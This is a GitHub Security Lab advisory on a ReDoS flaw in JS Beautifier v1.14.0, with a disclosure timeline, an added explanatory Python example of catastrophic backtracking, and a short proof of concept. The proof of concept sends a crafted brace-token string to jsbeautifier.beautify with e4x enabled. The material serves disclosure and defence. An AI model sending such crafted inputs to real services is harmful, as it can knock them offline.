Coordinated Disclosure Timeline

  • 2021-08-31: Sent report to bitwiseman@beautifier.io
  • 2021-10-14: They have code scanning enabled, so this bug is listed in their code scanning results.
  • 2021-10-14: Sent a follow-up email to bitwiseman@beautifier.io with my suggested fix.
  • 2021-11-30: Disclosure deadline expired.
  • 2021-12-06: Created a pull request to fix the bug, but it turned out that my fix was incorrect.
  • 2021-12-09: Created a new pull request to fix the bug, which was successful.

Summary

JS Beautifier contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Product

JS Beautifier

Tested Version

v1.14.0

Details

ReDoS

ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions: a crafted input string can make the matching engine backtrack so much that it takes an extremely long time to finish.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions.
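The backtracking behaviour described above, shown as an added example that is not part of the GHSL advisory or of the js-beautify code base: a textbook nested-quantifier pattern next to a linear rewrite of the same language, a timing helper that makes the super-linear growth visible, and a coarse static check for the nested-quantifier shape that inefficient-regex queries flag. The `(a+)+` pattern, the crafted input and the `has_nested_quantifier` heuristic are constructed for illustration; the actual js-beautify regular expression is not reproduced here.

```python
# Added example (not code from the GHSL advisory or from js-beautify).
# The pattern, inputs and heuristic below are constructed for illustration.
import re
import time

# Nested quantifier: on input that can never satisfy the trailing '$', the
# backtracking engine tries every way of splitting the run of 'a' characters
# between the inner and outer '+'. Work roughly doubles with each extra 'a'.
VULNERABLE = re.compile(r"^(a+)+$")

# Same language without the nested quantifier: one linear scan of the input.
HARDENED = re.compile(r"^a+$")


def crafted_input(n: int) -> str:
    """Constructed worst-case input: n 'a' characters followed by one character
    that makes the overall match fail, forcing the engine to backtrack."""
    return "a" * n + "!"


def timed_match(pattern, text):
    """Return (matched, seconds) for pattern.match(text)."""
    start = time.perf_counter()
    matched = pattern.match(text) is not None
    return matched, time.perf_counter() - start


def growth_ratio(pattern, small: int, large: int) -> float:
    """Match time at input size `large` divided by match time at size `small`.
    A ratio near 1 means the extra characters cost almost nothing; a large
    ratio indicates super-linear backtracking."""
    _, t_small = timed_match(pattern, crafted_input(small))
    _, t_large = timed_match(pattern, crafted_input(large))
    return t_large / max(t_small, 1e-9)


def has_nested_quantifier(pattern_source: str) -> bool:
    """Coarse static check for a quantified group that is itself quantified,
    e.g. '(a+)+' or '(\\w*)*'. A triage heuristic (constructed here), not a
    proof that a pattern is safe or unsafe."""
    return re.search(r"\([^()]*[+*]\)[+*]", pattern_source) is not None


if __name__ == "__main__":
    for name, pat in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(f"{name}: nested quantifier? {has_nested_quantifier(pat.pattern)}")
        for n in (12, 15, 18):
            matched, secs = timed_match(pat, crafted_input(n))
            print(f"  n={n:2d} matched={matched} time={secs:.4f}s")
```

Both patterns accept exactly the same strings, so the rewrite is a pure performance fix; that equivalence is what a maintainer has to establish before replacing a flagged pattern, and the static heuristic only narrows down which patterns deserve that scrutiny.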

Vulnerability

The vulnerable regular expression is here.

Please follow these steps to reproduce the issue:

  • Install jsbeautifier: pip3 install jsbeautifier
  • Run the below with python3:
import jsbeautifier

# Crafted input: a long run of "{a}" tokens followed by an unterminated "{>",
# which drives the vulnerable regular expression into catastrophic backtracking.
str = '''
return <- {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {>
'''

print(jsbeautifier.beautify(str, {'e4x': True}))

Impact

This issue may lead to a denial of service.

Credit

This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2021-113 in any communication regarding this issue.